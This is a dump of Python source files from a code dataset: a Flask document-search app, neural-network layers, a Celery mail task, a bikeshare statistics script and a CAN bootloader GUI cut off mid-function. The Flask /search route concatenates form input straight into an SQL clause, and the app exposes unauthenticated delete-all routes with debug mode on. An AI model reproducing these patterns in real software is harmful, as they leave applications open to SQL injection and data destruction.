\"children\": []\n },\n {\n \"name\": \"Surat keterangan\",\n \"children\": []\n },\n {\n \"name\": \"Surat pernyataan\",\n \"children\": []\n },\n {\n \"name\": \"Pengumuman\",\n \"children\": []\n },\n {\n \"name\": \"Laporan\",\n \"children\": []\n },\n {\n \"name\": \"Notula\",\n \"children\": []\n }\n ]\n }\n ]\n}\n\n@app.route('/')\ndef home():\n RESULTS[\"children\"][3][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][3][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][1][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][4][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][7][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][8][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][4][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][6][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][5][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][3][\"children\"] = []\n query = dao_rnn.getAllData()\n return render_template('index.html', query=query)\n\n@app.route('/search', methods=['POST'])\ndef search():\n condition = 'where '+request.form['condition']+' like \\'%'+request.form['query']+'%\\''\n print(condition)\n query = dao_rnn.getData(condition)\n print(query[0][6])\n RESULTS[\"children\"][3][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][3][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][1][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][4][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][7][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][8][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][4][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][6][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][0][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][1][\"children\"] = []\n RESULTS[\"children\"][4][\"children\"][5][\"children\"] = []\n RESULTS[\"children\"][0][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][2][\"children\"][2][\"children\"] = []\n RESULTS[\"children\"][3][\"children\"][3][\"children\"] = []\n \n for i in range(len(query)):\n if query[i][6] == 'Nota Dinas':\n RESULTS[\"children\"][3][\"children\"][0][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif 
query[i][6] == 'Nota Kesepahaman':\n RESULTS[\"children\"][4][\"children\"][0][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Berita Acara':\n RESULTS[\"children\"][4][\"children\"][3][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Dinas':\n RESULTS[\"children\"][3][\"children\"][2][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Edaran':\n RESULTS[\"children\"][0][\"children\"][1][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Instruksi':\n RESULTS[\"children\"][2][\"children\"][0][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Keputusan':\n RESULTS[\"children\"][1][\"children\"][0][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Keterangan':\n RESULTS[\"children\"][4][\"children\"][4][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Kuasa':\n RESULTS[\"children\"][4][\"children\"][2][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Laporan':\n RESULTS[\"children\"][4][\"children\"][7][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Memo':\n RESULTS[\"children\"][3][\"children\"][1][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Notula':\n RESULTS[\"children\"][4][\"children\"][8][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Pengantar':\n RESULTS[\"children\"][3][\"children\"][4][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Pengumuman':\n RESULTS[\"children\"][4][\"children\"][6][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Peraturan':\n RESULTS[\"children\"][0][\"children\"][0][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Perintah':\n RESULTS[\"children\"][2][\"children\"][1][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Perjanjian Kerjasama':\n RESULTS[\"children\"][4][\"children\"][1][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n elif query[i][6] == 'Surat Pernyataan':\n RESULTS[\"children\"][4][\"children\"][5][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": 
query[i][1]}]}]})\n        elif query[i][6] == 'Surat Prosedur':\n            RESULTS[\"children\"][0][\"children\"][2][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n        elif query[i][6] == 'Surat Tugas':\n            RESULTS[\"children\"][2][\"children\"][2][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n        elif query[i][6] == 'Surat Undangan':\n            RESULTS[\"children\"][3][\"children\"][3][\"children\"].append({\"name\": query[i][3],\"children\": [{\"name\": query[i][4],\"children\":[{\"name\": query[i][1]}]}]})\n\n    return render_template('index.html', query=query)\n\n@app.route('/datasearch')\ndef datasearch():\n    return jsonify(RESULTS)\n\n@app.route('/raw-pdf/<filename>')\ndef download_file(filename):\n    return send_from_directory('./raw-pdf/', filename)\n\n@app.route('/delete/<id>')\ndef delete(id):\n    dao_rnn.deleteData(id)\n    return redirect('/')\n\n@app.route('/deleteall')\ndef deleteAll():\n    dao_rnn.deleteAllData()\n    return redirect('/')\n\n# @app.route('/user/<username>')\n# def profile(username):\n#     return '{}\\'s profile'.format(username)\n\n# with app.test_request_context():\n#     print(url_for('hello'))\n#     print(url_for('login'))\n#     print(url_for('login', next='/'))\n#     print(url_for('profile', username='John Doe'))\n\nif __name__ == '__main__':\n    app.debug = True\n    app.run()","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":11570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"584390909","text":"import torch\nimport numpy as np\n\nfrom nn.base import Module\n\n\nclass FullyConnectedLayer(Module):\n    \"\"\"\n    Layer that applies a linear transformation: Y = X @ W + b, Y \in R^{N x n_out}, X \in R^{N x n_in}.\n\n    Attributes\n    ----------\n    `W` : torch.tensor, shape=(in_features, out_features)\n        Weight matrix of size (in_features, out_features), where in_features is the number of input\n        features and out_features is the number of neurons in the layer.\n    `b` : torch.tensor, shape=(out_features,)\n        Bias vector, one value per neuron.\n    `gradW` : torch.tensor, shape=(in_features, out_features)\n        Stores the gradient of the weight matrix of the linear layer.\n    `gradb` : torch.tensor, shape=(out_features,)\n        Stores the gradient of the bias vector.\n    \"\"\"\n\n    def __init__(self, in_features, out_features, bias=True, init=None):\n        \"\"\"\n        Parameters\n        ----------\n        `in_features` : integer\n            Number of input features of the layer.\n        `out_features` : integer\n            Number of output features of the layer.\n        `bias` : boolean\n            Whether a bias term is needed.\n        `init` : torch.tensor with shape=(in_features, out_features)\n            Values used to initialise the layer weights. Note that in the pytorch\n            implementation the bias is not initialised externally, so it is not here either.\n        \"\"\"\n        super(FullyConnectedLayer, self).__init__()\n        self.b = None\n        self.W = None\n\n        if init is not None:\n            self.W = init.clone().detach()\n        else:\n            stdv = 1. / np.sqrt(in_features)\n            self.W = torch.tensor(np.random.uniform(-stdv, stdv, size=(in_features, out_features)), dtype=torch.float)\n            if bias:\n                self.b = torch.tensor(np.random.uniform(-stdv, stdv, size=out_features), dtype=torch.float)\n\n        # Gradient buffers, matching the shapes of W and b\n        self.gradW = torch.full((in_features, out_features), fill_value=0., dtype=torch.float)\n        self.gradb = torch.full((1, out_features), fill_value=0., dtype=torch.float)\n\n    def forward(self, module_input):\n        self.output = torch.matmul(module_input, self.W)\n        if self.b is not None:\n            self.output += self.b\n\n        return self.output\n\n    def zero_grad(self):\n        self.gradW.fill_(0.)\n        self.gradb.fill_(0.)\n\n    def update_module_input_grad(self, module_input, grad_output):\n        self.grad_input = torch.matmul(grad_output, self.W.t())\n        return self.grad_input\n\n    def update_params_grad(self, module_input, grad_output):\n        self.gradW = torch.matmul(module_input.t(), grad_output)\n        if self.b is not None:\n            self.gradb = torch.sum(grad_output, dim=0)\n\n    @property\n    def parameters(self):\n        return [self.W, self.b]\n\n    @property\n    def grad_params(self):\n        return [self.gradW, self.gradb]\n\n    # def apply_grad(self):\n    #     raise NotImplementedError\n\n\nclass Softmax(Module):\n    \"\"\"Applies the softmax transformation. See README.md for the details of the formulas.\"\"\"\n\n    def forward(self, module_input):\n        # Normalise for numerical stability, then exponentiate\n        self.output = torch.exp(module_input - module_input.max(dim=1, keepdim=True).values)\n        self.output /= self.output.sum(dim=1, keepdim=True)\n\n        return self.output\n\n    # TODO: try to do this without loops, but that is not easy\n    def update_module_input_grad(self, module_input, grad_output):\n        # self.grad_input has to be initialised first, since it is indexed below\n        if self.grad_input is None:\n            self.grad_input = torch.zeros(size=self.output.shape)\n\n        for i in range(self.output.shape[0]):\n            softmax_i = self.output[i, :].unsqueeze(1)\n            partial_softmax = -torch.matmul(softmax_i, softmax_i.t()) + torch.diag(softmax_i.squeeze())\n            for j in range(self.output.shape[1]):\n                self.grad_input[i, j] = torch.dot(grad_output[i, :], partial_softmax[:, j])\n\n        return self.grad_input\n\n\nclass LogSoftmax(Module):\n    \"\"\"Applies the log(softmax) transformation. See README.md for the details of the formulas.\"\"\"\n\n    def forward(self, module_input):\n        # Normalise for numerical stability\n        self.output = module_input - module_input.max(dim=1, keepdim=True).values\n        self.output = self.output - torch.log(torch.sum(torch.exp(self.output), dim=1, keepdim=True))\n\n        return self.output\n\n    def update_module_input_grad(self, module_input, grad_output):\n        # Normalise for numerical stability, then exponentiate\n        exp_module_input = torch.exp(module_input - module_input.max(dim=1, keepdim=True).values)\n        softmax = exp_module_input / torch.sum(exp_module_input, dim=1, keepdim=True)\n\n        self.grad_input = grad_output - torch.mul(softmax, torch.sum(grad_output, dim=1, keepdim=True))\n\n        return self.grad_input\n","sub_path":"nn/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"198785135","text":"\nfrom app import mail,celery\nfrom flask_mail import Message\nimport os\nfrom run import app\nfrom flask import current_app,render_template\n\n\n@celery.task\ndef send_async_mail(to, subject, html_tem=None, accessory_path=None, **kwargs):\n    with app.app_context():\n        msg = Message(\n            subject=subject,\n            sender=current_app.config.get(\"MAIL_DEFAULT_SENDER\",None),\n            recipients=[to]\n        )\n        msg.html = render_template(html_tem+\".html\",**kwargs)\n        # accessory_path is the path of the attached resource\n        with current_app.open_resource(accessory_path) as fp:\n            msg.attach(os.path.basename(accessory_path), \"image/png\", fp.read())\n\n        mail.send(msg)\n\n\n@celery.task\ndef sum(a,b):\n    print(a+b)\n    return a+b","sub_path":"tools/mail_tools.py","file_name":"mail_tools.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"187944328","text":"'''\nWrite a program that, as shown below, distinguishes between upper- and lower-case letters in a sentence entered by the user and prints the count of each.\n'''\n\ninput_str = input()\n\ntext = {\n    \"UPPER CASE\": 0,\n    \"LOWER CASE\": 0\n}\n\nfor i in input_str:\n    if i.isalpha():\n        if i.isupper():\n            text[\"UPPER CASE\"] += 1\n        elif i.islower():\n            text[\"LOWER CASE\"] += 1\n\nfor key in text:\n    print(\"{} {}\".format(key,text[key]))","sub_path":"PYTHON/파이썬_프로그래밍_기초_문제풀이/13/13-07.py","file_name":"13-07.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"405201278","text":"# Importing required libraries\nimport time\nimport pandas as pd\nimport datetime\n\n# City data dictionary\nCITY_DATA = {'chicago': 'chicago.csv',\n             'new york city': 'new_york_city.csv',\n             'washington': 'washington.csv'}\n\n# Days in chronological order\ndays_dict = {'mon': 'Monday', 'tue': 'Tuesday', 'wed': 'Wednesday', 'thu': 'Thursday', 'fri': 'Friday',\n             'sat': 'Saturday', 'sun': 'Sunday', 'all': 'No filters'}\n\n# Months in chronological order\nmonth_dict = {'jan': 'January', 'feb': 'February', 'mar': 'March', 'apr': 'April', 'may': 'May', 'jun': 'June',\n              'all': 'No filters'}\n\n\n# Function to confirm a user's input\ndef confirm_input():\n    while True:\n        answer = str(input(\"Please confirm your input\\nEnter 'y' to continue or 'n' to restart:\\n\").strip().lower())\n        if answer not in (\"y\", \"n\"):\n            print(\"\\nInvalid Response. 
Please try again\")\n continue\n elif answer == \"y\":\n break\n else:\n get_filters()\n\n\n# Function to filter data by user's input\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print()\n print('-' * 44)\n print('Hello! Let\\'s explore some US bikeshare data!')\n print('-' * 44)\n\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n print()\n while True:\n city = (input(\"Which city do you want to select bikeshare data from?\\nPlease enter either 'Chicago', \"\n \"'New York City' or 'Washington'\\n\")).strip().lower()\n if city in [\"chicago\", \"new york city\", \"washington\"]:\n break\n else:\n print(\"\\nInvalid input!!! Trying again...\")\n\n # get user input for month (all, january, february, ... , june)\n print()\n while True:\n month = (input(\"From January to June, which Month do you want to filter the bikeshare data by?\\nPlease enter \"\n \"'Jan', 'Feb', 'Mar', 'Apr', 'May' or 'Jun' to represent each of the months.\\nEnter 'all' \"\n \"to apply no month filter\\n\")).strip().lower()\n if month in [\"jan\", \"feb\", \"mar\", \"apr\", \"may\", \"jun\", \"all\"]:\n break\n else:\n print(\"\\nInvalid input!!! Trying again\")\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n print()\n while True:\n day = (input(\"What day of the week do you want to filter the bikeshare data by?\\nPlease enter 'Mon', 'Tue', \"\n \"'Wed', 'Thu', 'Fri', 'Sat' or 'Sun' to represent the day of the week.\\nEnter 'all' to apply no \"\n \"day filter\\n\")).strip().lower()\n if day in [\"mon\", \"tue\", \"wed\", \"thu\", \"fri\", \"sat\", \"sun\", \"all\"]:\n break\n else:\n print(\"\\nInvalid input!!! 
Trying again...\")\n\n print(\"\\nYour inputs are..\\n\\tCity : {}\\n\\tMonth : {}\\n\\tDay : {}\\n\"\n \"\".format(city.capitalize(), month_dict[month], days_dict[day]))\n confirm_input()\n\n print('-' * 48)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n\n # loading city data file into a data frame\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime type\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract Month from the Start Time column to create month column\n df['Month'] = df['Start Time'].dt.month\n\n # extract day of week from the Start Time column to create day of week column\n df['Day_of_Week'] = df['Start Time'].dt.day_name()\n\n # extract hour from the Start Time column to create hour column\n df['Hour'] = df['Start Time'].dt.hour\n\n # Filtering by month if user enters a month other than 'all'\n if month != 'all':\n # Listing months in chronological order\n months = [\"jan\", \"feb\", \"mar\", \"apr\", \"may\", \"jun\"]\n\n # Month converted to numbers\n month = months.index(month) + 1\n\n # Filtering by month to create new data frame\n df = df[df['Month'] == month]\n\n # Filtering by month if user enters a day other than 'all'\n if day != 'all':\n # filter by day of week to create the new data frame\n df = df[df['Day_of_Week'] == days_dict[day]]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n popular_month = df['Month'].mode()[0]\n month_int_dict = {1: 'January', 2: 'February', 3: 'March', 4: 'April', 5: 'May', 6: 'June'}\n print('\\t1. Most Common Month:', month_int_dict[popular_month])\n\n # display the most common day of week\n popular_day = df['Day_of_Week'].mode()[0]\n print('\\t2. Most Common Day of Week:', popular_day)\n\n # display the most common start hour\n popular_hour = df['Hour'].mode()[0]\n print('\\t3. Most Common Start Hour:', popular_hour)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n start_station = df['Start Station'].mode()[0]\n print('\\t1. Most commonly used start station:', start_station)\n\n # display most commonly used end station\n end_station = df['End Station'].mode()[0]\n print('\\t2. Most commonly used end station:', end_station)\n\n # display most frequent combination of start station and end station trip\n df['Start-End Combination'] = (df['Start Station'] + ' - ' + df['End Station'])\n start_end_comb = df['Start-End Combination'].mode()[0]\n print('\\t3. 
Most frequent combination of start station and end station trip:', str(start_end_comb))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n sum_travel_time = df['Trip Duration'].sum()\n\n # support type for timedelta seconds component\n total_travel_time = sum_travel_time.astype('float64', copy=False)\n\n # convert time to timedelta object\n converted_time = datetime.timedelta(seconds=total_travel_time)\n\n # display total travel time in time delta format\n print('\\t1. Total travel time is as follows: \\n\\t\\tin seconds ==> {} seconds\\n\\t\\tin time delta format ==> {}'.\n format(str(total_travel_time), str(converted_time)))\n\n # display mean travel time\n mean_travel_time = df['Trip Duration'].mean()\n\n # convert time to timedelta object\n mean_converted_time = datetime.timedelta(seconds=mean_travel_time)\n print('\\n\\t2. Mean travel time is as follows: \\n\\t\\tin seconds ==> {} seconds\\n\\t\\tin time delta format ==> {}'.\n format(str(mean_travel_time), str(mean_converted_time)))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef user_stats(df, city):\n \"\"\"\n Displays statistics on bikeshare users.\n\n Args:\n df - Pandas DataFrame containing city data filtered by month and day\n (str) city - name of the city to analyze\n \"\"\"\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n user_type_count = df[\"User Type\"].value_counts().to_string()\n # Splitting the user types data into array for desired output format\n user_type_array = user_type_count.split()\n print(\"\\t1. Counts of users' type is as follows:\\n\\t\\t\\t{} : {} counts\\n\\t\\t\\t{} : {} \"\n \"counts\".format(user_type_array[0], user_type_array[1], user_type_array[2], user_type_array[3]))\n\n # Display counts of gender\n if \"Gender\" in df.columns:\n gender_count = df[\"Gender\"].value_counts().to_string()\n # Splitting the users' gender data into array for desired output format\n user_gender_array = gender_count.split()\n\n # Counting null values in Gender\n nan_total = df[\"Gender\"].isna().sum()\n\n print(\"\\n\\t2.Counts of users' gender is as follows:\\n\\t\\t\\t{} : {} counts\\n\\t\\t\\t{} : {} counts\\n\\t\\tNote: \"\n \"there were {} NaN data values in the 'Gender' column\".format(user_gender_array[0], user_gender_array[1],\n user_gender_array[2], user_gender_array[3],\n nan_total))\n else:\n print(\"\\n\\t2. {} has no data for users' gender\".format((str(city)).capitalize()))\n\n # Display earliest, most recent, and most common year of birth\n if \"Birth Year\" in df.columns:\n earliest_year = df['Birth Year'].min()\n most_recent_year = df['Birth Year'].max()\n most_common_year = df['Birth Year'].mode()[0]\n print('\\n\\t3. Earliest year of birth:', int(earliest_year))\n print('\\t4. Most recent year of birth:', int(most_recent_year))\n print('\\t5. Most common year of birth:', int(most_common_year))\n\n else:\n print(\"\\t3. {} has no data for users' year of birth\".format((str(city)).capitalize()))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef show_raw_data(df):\n response = input(\"\\nWould you like to see individual raw data? 
Enter 'yes' or 'no'\\n\").lower()\n # Catch if a user enters just 'y' as earlier used in code\n if response in (\"yes\", \"y\"):\n i = 0\n\n while True:\n # Printing from lower limit to length of dataframe rows if 'i' is out of bounds\n if i + 5 > len(df.index) - 1:\n print(df.iloc[i:len(df.index), :])\n print(\"You've reached the end of the rows\")\n break\n\n # Printing the dataframe in a set of 5 rows if 'i' is not out of bounds\n print(df.iloc[i:i + 5, :])\n i += 5\n\n # Asking to show more rows in 5\n response_show_next_five = input(\"\\nWould you like to see the next 5 rows? Enter 'yes' or \"\n \"'no'\\n\").strip().lower()\n # Catch if a user enters just 'y' as earlier used in code\n if response_show_next_five not in (\"yes\", \"y\"):\n break\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df, city)\n show_raw_data(df)\n #\n restart = input(\"\\nWould you like to restart? Enter 'y' to restart or any other character \"\n \"to exit the program.\\n\")\n if restart.lower() not in ('yes', 'y'):\n break\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bikeshare_2.py","file_name":"bikeshare_2.py","file_ext":"py","file_size_in_byte":11645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"537490565","text":"import tkinter as tk\nfrom tkinter import ttk, Menu, filedialog, messagebox\nimport datetime\nfrom threading import Thread\nimport os\nfrom ctypes import *\nfrom CANLoaderController import CANLoaderController, CANLoaderFirmwareVerifyException, CANLoaderDeviceFailureException\nimport queue\nfrom CANFoxLib import CANFoxLibSkin, CANfoxException, CANfoxHardwareException\nfrom enum import *\nimport settings\nimport platform\nimport CANTypeDefs\nfrom ThreadCANMsgReader import ThreadCANMsgReader\n\nif platform.architecture()[0] == '32bit':\n from sieca132_client_x32 import sieca132_client\nelse:\n from sieca132_client_x64 import sieca132_client\n\nimport CANLoaderAbout\n\n\nclass te_OperationState(Enum):\n os_BEGIN = 0\n os_END = 1\n\n def __int__(self):\n return self.value\n\n\nclass WorkingAction(Enum):\n wa_INIT = 0\n wa_NONE = 1\n wa_PROGRAMMING = 2\n wa_VERIFYING = 3\n wa_DEVICE_READING = 4\n wa_ERROR = 5\n wa_HARDWARE_ERROR = 6\n\n def __int__(self):\n return self.value\n\nclass te_CurrentDeviceBootloaderState(Enum):\n bs_InBootloader = 0\n bs_Unknown = 1\n\n def __int__(self):\n return self.value\n\n\nclass MainApplication(tk.Frame):\n def __init__(self, master=None):\n self.master = master\n tk.Frame.__init__(self, master)\n self.QueueProgressBar = queue.Queue(10)\n self.QueueThreadProgrammingService = queue.Queue(1)\n self.QueueThreadVerifyingService = queue.Queue(1)\n self.QueueThreadReadingService = queue.Queue(1)\n self.QueueIncomingMessages = queue.Queue(100)\n self.__can_hasReprogrammableDevices = False\n self.__workingAction = WorkingAction.wa_NONE\n self.init_window()\n\n def key(self, event):\n kp = event.char\n esc_key = chr(0x1b)\n if kp == esc_key:\n {\n WorkingAction.wa_NONE: lambda: None,\n WorkingAction.wa_PROGRAMMING: lambda: self.QueueThreadProgrammingService.put(\"exit\") if (messagebox.askyesno(\"Cancel programming?\")) else None,\n WorkingAction.wa_VERIFYING: lambda: self.QueueThreadVerifyingService.put(\"exit\") if (messagebox.askyesno(\"Cancel verifying?\")) else None,\n WorkingAction.wa_DEVICE_READING: lambda: self.QueueThreadReadingService.put(\"exit\") if 
(messagebox.askyesno(\"Cancel reading?\")) else None,\n WorkingAction.wa_ERROR: lambda: None,\n WorkingAction.wa_HARDWARE_ERROR: lambda: None\n\n }[self.__workingAction]()\n\n def __enable_find_controls__(self):\n self.__enable_controls__(self.frameCanDevice)\n self.buttonLeaveBootloader.configure(state='disable')\n self.buttonLock.configure(state='disable')\n self.buttonCanConnect.configure(state='disable')\n return\n\n def __disable_controls__(self, parent):\n for child in parent.winfo_children():\n try:\n child.configure(state='disable')\n except Exception as e:\n continue\n return\n\n def __enable_controls__(self, parent):\n for child in parent.winfo_children():\n try:\n child.configure(state='normal')\n except Exception as e:\n continue\n return\n\n def __enable_controls_programming__(self):\n if hasattr(self, 'reprogrammable_devices') and len(self.reprogrammable_devices) != 0:\n if os.path.exists(self.flashFilePath.get()) and os.path.getsize(str(self.flashFilePath.get())) > 0:\n self.__enable_controls__(self.frameProgramming)\n self.entryFlashFile.configure(state=\"disable\")\n if hasattr(self, 'CurrentDeviceBootloaderState') and self.CurrentDeviceBootloaderState == te_CurrentDeviceBootloaderState.bs_InBootloader:\n self.buttonLeaveBootloader.configure(state=\"normal\")\n self.buttonLock.configure(state=\"normal\")\n else:\n self.buttonLeaveBootloader.configure(state=\"disable\")\n self.buttonLock.configure(state=\"disable\")\n self.buttonReadFlash.configure(state='normal')\n self.buttonSelectFlashFile.configure(state='normal')\n else:\n self.labelStatus['text'] = \"None\"\n self.labelStatus.config(bg=\"gray\")\n self.entryNodeIDText.set(\"\")\n self.entryMCUInfoText.set(\"\")\n self.__disable_controls_programming__()\n return\n\n def __disable_controls_programming__(self):\n self.__disable_controls__(self.frameProgramming)\n self.buttonLeaveBootloader.configure(state=\"disable\")\n self.buttonLock.configure(state=\"disable\")\n return\n\n def __enable_controls_device__(self):\n self.__enable_controls__(self.frameFoundCanDevices)\n self.__enable_controls__(self.frameCanDevice)\n self.comboboxFoundCanDevices.configure(state=\"readonly\")\n self.buttonCanConnect.config(state=\"disabled\")\n return\n\n def __disable_controls_device__(self):\n self.__disable_controls__(self.frameCanDevice)\n self.__disable_controls__(self.frameFoundCanDevices)\n self.buttonFind.config(state=\"disabled\")\n return\n\n def __reset_all_controls__(self):\n self.__disable_controls__(self.frameCanDevice)\n self.__disable_controls__(self.frameFoundCanDevices)\n self.buttonFind.config(state=\"normal\")\n self.buttonCanConnect.config(state=\"normal\")\n\n def __switch_controls__(self, operation_state):\n if operation_state == te_OperationState.os_BEGIN:\n {\n WorkingAction.wa_INIT: lambda: self.__reset_all_controls__(),\n WorkingAction.wa_NONE: lambda: self.__disable_controls_programming__(),\n WorkingAction.wa_PROGRAMMING: lambda: (self.__disable_controls_programming__(), self.__disable_controls_device__()),\n WorkingAction.wa_VERIFYING: lambda: (self.__disable_controls_programming__(), self.__disable_controls_device__()),\n WorkingAction.wa_DEVICE_READING: lambda: (self.__disable_controls_programming__(), self.__disable_controls_device__()),\n WorkingAction.wa_ERROR: lambda: (self.__disable_controls_programming__(), self.__disable_controls_device__()),\n WorkingAction.wa_HARDWARE_ERROR: lambda: (self.__reset_all_controls__())\n }[self.__workingAction]()\n else:\n {\n WorkingAction.wa_INIT: lambda: 
